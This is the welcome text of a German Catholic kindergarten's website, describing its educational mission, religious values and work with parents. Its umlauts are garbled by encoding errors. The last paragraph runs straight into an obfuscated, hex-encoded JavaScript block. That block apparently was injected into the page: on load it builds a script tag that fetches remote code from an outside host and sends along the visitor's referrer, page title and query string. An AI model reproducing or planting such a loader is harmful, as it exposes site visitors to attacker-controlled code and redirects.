DIGITAL CAMERAKleine Leute werden bei uns ganz groAY!

Herzliche Einladung an Sie, uns auf den folgenden Seiten nA�her kennen zu lernen.

Wir sind eine katholische Kindertageseinrichtung und gehA�ren zum katholischen Kirchengemeindeverband JA?chen (KGV).

Die Zeit, in der wir leben ist rasant und geprA�gt von permanenten VerA�nderungen. Auch Kindertageseinrichtungen entwickeln sich in einem enormen Tempo. Das Ziel ist es, den Auftrag im Sinne des Kinderbildungsgesetzes (KiBiz) der da lautet: Bildung, Erziehung und Betreuung. immer noch etwas besser zu erfA?llen.

Diese Rahmenvorgaben nehmen wir sehr ernst. Wir sehen uns als Kindertageseinrichtung in der Verantwortung, Kinder gemA�AY ihren Begabungen, FA�higkeiten und Fertigkeiten zu fA�rdern. FA?r uns als Einrichtung des katholischen Kirchengemeindeverbandes JA?chen ist die Entdeckung und Weiterentwicklung der christlichen und religiA�sen Werte, neben der FA�rderung der geistigen, sozialen und emotionalen Entwicklung der uns anvertrauten Kinder, ein wesentlicher Baustein der kindlichen PersA�nlichkeitsentwicklung.

WA�hrend der Kindergartenzeit wird der Grundstein gelegt und Weichen fA?r das Leben der Kinder gestellt. Auf Grund dessen A?bernehmen wir als Erzieherinnen eine besondere Verantwortung fA?r die Erziehung der Kinder. Wir sind dabei auf die enge Zusammenarbeit mit den Eltern angewiesen. Zudem ist es A�uAYerst hilfreich, auf ein gutes Netzwerk von Menschen mit unterschiedlichen Qualifikationen zurA?ckgreifen zu kA�nnen, die unsere Arbeit fA�rdernd unterstA?tzen.

In unserer Konzeption, die eine stA�ndige Aktualisierung erfA�hrt, stellen wir das Ergebnis der pA�dagogischen Profilbildung vor. Die Konzeption ist der verbindliche Rahmen des Handelns aller Mitarbeiterinnen dieser Einrichtung. Sie dient der Orientierung und QualitA�tssicherung.

Wie wir als Team der gemeinsamen Verantwortung fA?r die Kinder und deren Familien insgesamt gerecht werden, wie wir diesen hohen Anspruch an unsere Arbeit in die Praxis umsetzen, wird dort im Einzelnen erlA�utert.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}